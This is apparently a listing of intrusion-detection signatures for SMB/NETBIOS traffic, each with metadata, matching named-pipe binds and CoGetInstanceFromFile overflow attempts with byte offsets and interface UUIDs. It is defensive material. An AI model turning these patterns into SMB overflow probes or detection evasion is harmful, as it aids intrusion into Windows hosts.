Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103090

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrpc create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB|A2|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|5C|llsrpc|00|"; within:8; distance:78; nocase; classtype:protocol-command-decode; sid:2103090; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrpc create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103099

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrpc little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"@|FD|,4l<|CE 11 A8 93 08 00|+.|9C|m"; within:16; distance:29; flowbits:set,smb.tree.bind.llsrpc; classtype:protocol-command-decode; sid:2103099; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrpc little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103160

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB msqueue bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103160; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB msqueue bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103161

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB msqueue little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103161; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB msqueue little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102932

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB nddeapi bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; content:"|0B|"; within:1; distance:1; content:" 2_/&|C1|v|10 B5|I|07|M|07 86 19 DA|"; within:16; distance:29; flowbits:set,smb.tree.bind.nddeapi; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102932; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB nddeapi bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103162

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB msqueue unicode bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103162; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB msqueue unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103163

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB msqueue unicode little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103163; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB msqueue unicode little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102928

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB nddeapi create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB|A2|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|5C|nddeapi|00|"; within:9; distance:78; nocase; flowbits:set,smb.tree.create.nddeapi; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102928; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB nddeapi create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102933

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB nddeapi unicode bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; content:"|0B|"; within:1; distance:1; content:" 2_/&|C1|v|10 B5|I|07|M|07 86 19 DA|"; within:16; distance:29; flowbits:set,smb.tree.bind.nddeapi; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102933; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB nddeapi unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102929

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB nddeapi unicode create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB|A2|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|5C 00|n|00|d|00|d|00|e|00|a|00|p|00|i|00 00 00|"; within:18; distance:78; nocase; flowbits:set,smb.tree.create.nddeapi; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102929; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB nddeapi unicode create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103202

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB winreg bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; flowbits:noalert; classtype:protocol-command-decode; sid:2103202; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB winreg bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102940

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB winreg bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; classtype:protocol-command-decode; sid:2102940; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB winreg bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102174

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB winreg create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB|A2|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|5C|winreg|00|"; within:8; distance:78; nocase; flowbits:set,smb.tree.create.winreg; classtype:protocol-command-decode; sid:2102174; rev:9; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB winreg create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103203

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB winreg little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; flowbits:noalert; classtype:protocol-command-decode; sid:2103203; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB winreg little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103204

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB winreg unicode bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; flowbits:noalert; classtype:protocol-command-decode; sid:2103204; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB winreg unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102941

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB winreg unicode bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; classtype:protocol-command-decode; sid:2102941; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB winreg unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102175

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB winreg unicode create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB|A2|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|5C 00|w|00|i|00|n|00|r|00|e|00|g|00 00 00|"; within:16; distance:78; nocase; flowbits:set,smb.tree.create.winreg; classtype:protocol-command-decode; sid:2102175; rev:10; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB winreg unicode create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 10

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103205

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB winreg unicode little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; flowbits:noalert; classtype:protocol-command-decode; sid:2103205; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB winreg unicode little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103433

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS CoGetInstanceFromFile attempt"; flow:established,to_server; flowbits:isset,dce.isystemactivator.bind; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 04|"; within:2; distance:19; content:"|5C 5C|"; byte_test:4,>,256,6; classtype:protocol-command-decode; sid:2103433; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS CoGetInstanceFromFile attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103434

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS CoGetInstanceFromFile little endian attempt"; flow:established,to_server; flowbits:isset,dce.isystemactivator.bind; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|04 00|"; within:2; distance:19; content:"|5C 5C|"; byte_test:4,>,256,6,little; classtype:protocol-command-decode; sid:2103434; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS CoGetInstanceFromFile little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103185

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS CoGetInstanceFromFile little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|01 00|"; within:2; distance:19; byte_test:4,>,128,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103185; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS CoGetInstanceFromFile little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103184

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS CoGetInstanceFromFile overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 01|"; within:2; distance:19; byte_test:4,>,128,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103184; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS CoGetInstanceFromFile overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103435

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS CoGetInstanceFromFile unicode attempt"; flow:established,to_server; flowbits:isset,dce.isystemactivator.bind; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 04|"; within:2; distance:19; content:"|5C 00 5C 00|"; byte_test:4,>,256,8; classtype:protocol-command-decode; sid:2103435; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS CoGetInstanceFromFile unicode attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103436

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS CoGetInstanceFromFile unicode little endian attempt"; flow:established,to_server; flowbits:isset,dce.isystemactivator.bind; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|04 00|"; within:2; distance:19; content:"|5C 00 5C 00|"; byte_test:4,>,256,8,little; classtype:protocol-command-decode; sid:2103436; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS CoGetInstanceFromFile unicode little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103187

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS CoGetInstanceFromFile unicode little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|01 00|"; within:2; distance:19; byte_test:4,>,256,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103187; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS CoGetInstanceFromFile unicode little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103186

